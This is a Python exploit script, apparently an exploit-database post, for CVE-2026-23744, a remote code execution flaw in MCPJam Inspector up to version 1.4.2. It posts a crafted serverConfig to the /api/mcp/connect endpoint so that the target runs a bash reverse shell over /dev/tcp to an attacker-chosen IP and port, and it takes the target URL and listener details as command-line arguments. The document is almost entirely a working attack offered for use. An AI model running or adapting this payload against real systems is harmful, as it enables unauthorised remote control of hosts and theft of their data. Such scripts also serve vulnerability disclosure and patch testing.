# Exploit Title: MCPJam Inspector - Remote Code Execution
# Date: 07/03/2026
# Exploit Author: Diamorphine
# Vendor Homepage: https://www.mcpjam.com/
# Software Link: https://github.com/MCPJam
# Version: <=1.4.2
# Tested on: Debian
# CVE : CVE-2026-23744
import asyncio
import httpx
import argparse
from urllib.parse import urljoin
async def main(attacker_ip, attacker_port, url):
async with httpx.AsyncClient(verify=False) as client:
data = {
"serverConfig": {
"command": "bash",
"args": ["-c", f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"],
"env": {}
},
"serverId": "Hello666"
}
ready_url = urljoin(url, "/api/mcp/connect")
r = await client.post(url=ready_url, json=data)
print(r.text)
parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution")
parser.add_argument("-u", "--url", required=True, help="Target host. e.g. http://127.0.0.1:8080")
parser.add_argument("-l", "--lhost", required=True, help="Attacker ip")
parser.add_argument("-p", "--lport", required=True, help="Attacker port")
args = parser.parse_args()
if __name__ == '__main__':
asyncio.run(main(args.lhost, args.lport, args.url))